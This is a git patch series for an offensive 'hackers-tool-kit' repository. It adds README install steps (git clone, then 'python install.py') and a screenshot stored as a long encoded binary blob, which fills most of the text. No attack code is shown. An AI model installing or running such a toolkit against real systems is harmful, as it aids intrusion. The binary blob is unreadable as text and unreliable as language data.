From c9df2adba71a894801137359e46875306fd6f9c6 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 15 Feb 2019 10:01:28 +0100 Subject: [PATCH 001/214] Update README.md --- README.md | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 8576f3c..22ca891 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,13 @@ # hackers-tool-kit Its a framework filled with alot of options and hacking tools you use directly in the script -from brute forcing to payload making im still adding more stuff to see updates check on my instagram @unkn0wn_bali +from brute forcing to payload making im still adding more stuff to see updates check on +my instagram @unkn0wn_bali + +# install + +`git clone https://github.com/unkn0wnh4ckr/hackers-tool-kit` + +`cd hackers-tool-kit` + +`python install.py` From 921a25c11a5fce4b174357a538d3337c9ad275cb Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 15 Feb 2019 10:02:31 +0100 Subject: [PATCH 002/214] Update README.md --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 22ca891..5565b54 100644 --- a/README.md +++ b/README.md @@ -5,9 +5,9 @@ my instagram @unkn0wn_bali # install -`git clone https://github.com/unkn0wnh4ckr/hackers-tool-kit` +* `git clone https://github.com/unkn0wnh4ckr/hackers-tool-kit` -`cd hackers-tool-kit` +* `cd hackers-tool-kit` -`python install.py` +* `python install.py` From d92dad699e4218215552dc6c5fbf15ae49a2623b Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 15 Feb 2019 10:20:17 +0100 Subject: [PATCH 003/214] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 5565b54..125f169 100644 --- a/README.md +++ b/README.md @@ -11,3 +11,4 @@ my instagram @unkn0wn_bali * `python install.py` +# Screenshot From 4cae6946093adba5a7b5874c7ab3b0274c55c056 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 15 Feb 2019 10:23:28 +0100 Subject: [PATCH 004/214] Add files via upload --- screenshot.png | Bin 0 -> 44166 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 screenshot.png diff --git a/screenshot.png b/screenshot.png new file mode 100644 index 0000000000000000000000000000000000000000..7b3ab7112fc5ebdf07d127fc09763422ae494fa2 GIT binary patch literal 44166 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

eaf#%MxzpfPJ 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 